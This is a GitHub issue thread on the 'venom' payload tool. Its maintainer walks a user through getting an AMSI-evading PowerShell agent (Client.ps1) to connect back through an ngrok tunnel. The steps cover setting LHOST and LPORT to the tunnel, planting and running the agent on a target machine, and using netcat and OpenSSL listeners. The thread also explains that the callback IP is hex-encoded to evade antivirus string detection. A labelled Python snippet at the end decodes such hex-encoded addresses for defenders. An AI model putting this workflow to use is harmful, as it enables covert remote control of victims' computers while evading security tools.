
Comments (7)

r00t-3xp10it commented on July 17, 2024

see this: https://www.youtube.com/watch?v=fPF-slJLOlk&t=77s

from venom.

ricko2991 commented on July 17, 2024

Hi, @r00t-3xp10it I have no problem with the 1-7 payload categories when port forwarding.
But I have a problem with AMSI evasion, I can't do port forwarding with it.

from venom.

ricko2991 commented on July 17, 2024

Have you tried it and succeeded? Somehow I failed...
Can you show the host and the port you are using on the payload, and also the listeners you used?

Hi, I tried this:
2.tcp.ngrok.io:14598 --> localhost:1111

Payload options(ngrok)
LPORT : 14598
LHOST : 13.59.15.185 or LHOST : 2.tcp.ngrok.io

Listen
1º nc -lvp 0.0.0.0 14598 ==> invalid local port 0.0.0.0
2º nc -nlvp 1111 ==> Not connected / nc -lvp 1111 ==> not connected
3º nc -nlvp 14598 ==> not connected
4º nc -s 127.0.0.1 -nlvp 14598 ==> not connected
5º nc -s 127.0.0.1 -nlvp 1111 ==> not connected

from venom.

r00t-3xp10it commented on July 17, 2024

OK, let's try this step by step ...
Check this video for reference: https://www.youtube.com/watch?v=8YswLITdE7g

1º - ./ngrok tcp 14598
2º - choose venom - amsi evasion agent nº 2
3º - LHOST == 2.tcp.ngrok.io (ngrok)
4º - LPORT == 14598 (ngrok)
5º - go to /var/www/html and port the Agent (Client.ps1) to target machine (manually)
6º - start venom listener (OpenSSL)
7º - On target machine execute the Client.ps1

Final notes:

AMSI evasion agents require the Apache2 webserver to deliver files to the target host ...
so venom users need to port forward the Client.ps1 connection AND the apache2 webserver ..
"But in this exercise we are NOT going to port forward the apache2, just to test if the client connects back to the listener"..
OpenSSL agents require openssl s_server -quiet -key key.pem -cert cert.pem -port 14598 <- OpenSSL listener, not Netcat

from venom.

ricko2991 commented on July 17, 2024

Thank you, now it's working.
Also, for example, I am using agent no. 3 on AMSI and it is covered by "hex obfuscation". How do I decode a script covered by hex?

from venom.

r00t-3xp10it commented on July 17, 2024

The only thing encoded (hex) in agent nº 3 is the IP address ...
This is one attempt to hide the IP address 'string' from AMSI string detection inside Client.ps1 ...
hex


how to decode hex

from venom.
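
When triaging a captured script, a defender can recover an address hidden the way the reply above describes by searching for hex runs that decode to a valid IPv4 string. The Python below is an added example, not part of the thread or of venom; it assumes the address is stored as ASCII bytes written in hex, and the sample fragment, its variable names and the function name are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample: hypothetical script lines, not taken from Client.ps1.
# Addresses come from documentation/private ranges.
SAMPLE_SCRIPT = '''\
$a = "31 39 32 2e 30 2e 32 2e 31 30"
$b = "0x31,0x30,0x2e,0x30,0x2e,0x30,0x2e,0x35"
$c = "3139382e35312e3130302e37"
$d = "deadbeefcafebabe00112233"
'''

# At least 7 hex byte pairs (the shortest dotted quad, "1.1.1.1", is 7 chars),
# each with an optional 0x prefix and up to two separator characters.
HEX_RUN = re.compile(r'(?:(?:0x)?[0-9A-Fa-f]{2}[ ,\-]{0,2}){7,}')
HEX_PAIR = re.compile(r'(?:0x)?([0-9A-Fa-f]{2})')


def find_hex_ipv4(text):
    """Return (line_number, address) for each hex run that decodes to IPv4."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for run in HEX_RUN.finditer(line):
            pairs = HEX_PAIR.findall(run.group(0))
            try:
                decoded = bytes.fromhex(''.join(pairs)).decode('ascii')
                # Raises ValueError unless the text is a strict dotted quad.
                ipaddress.IPv4Address(decoded)
            except ValueError:
                # Non-ASCII bytes or not an address: ordinary hex data, skip.
                continue
            hits.append((lineno, decoded))
    return hits


if __name__ == '__main__':
    for lineno, addr in find_hex_ipv4(SAMPLE_SCRIPT):
        print(f'line {lineno}: hex-encoded IPv4 address {addr}')
```
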

ricko2991 commented on July 17, 2024

Thank you 👍

from venom.
